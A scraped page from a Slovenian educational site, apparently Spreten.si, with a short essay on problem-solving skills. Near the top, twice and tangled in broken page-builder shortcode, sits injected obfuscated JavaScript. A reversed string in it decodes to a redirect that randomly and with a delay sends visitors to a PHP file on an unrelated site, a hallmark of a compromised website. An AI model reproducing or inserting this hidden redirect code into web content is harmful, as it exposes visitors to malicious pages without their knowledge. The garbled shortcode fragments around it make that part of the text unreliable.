Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Reševanje problemov


Reševanje problemov je osrednja spretnost modernih učnih pristopov. V tujini je tako že dalj časa, v Sloveniji pa smo se je začeli zavedati skupaj z opozorili, da bodo v prihodnosti delovna mesta drugačna – ne več varna in dolgoročna, pač pa se bo posameznik moral biti sposoben prilagajti različnim delodajalcem in opravljati vedo nova dela.

Problem je za razliko od izziva ali naloge “odprt”. Ne ve se, kaj je rešitev. Zato ni pravilnih ali napačnih rešitev, so samo uporabne, dobre in najboljše rešitve. V šolah se večinoma uporabljajo naloge, pri katerih se morajo učenci spomniti, kaj od naučenega je treba uporabiti, da bo rešitev pravilna.

Spretnost reševanja problemov je življenska spretnost (“life skill”). Kdor jo obvlada, se problemov in izzivov ne ustraši (zaradi njihove nepredvidljivosti), pač pa se loti njihovega reševanja. Korak po korak. Problem najprej razstavi na manjše, obvladljive dele in potem rešuje enega za drugim, da na koncu pride do rešitve celega problema.

Tako se učenja lotevamo tudi pri Spreten.si. S problemi, analitičnim in logičnim mišljenjem.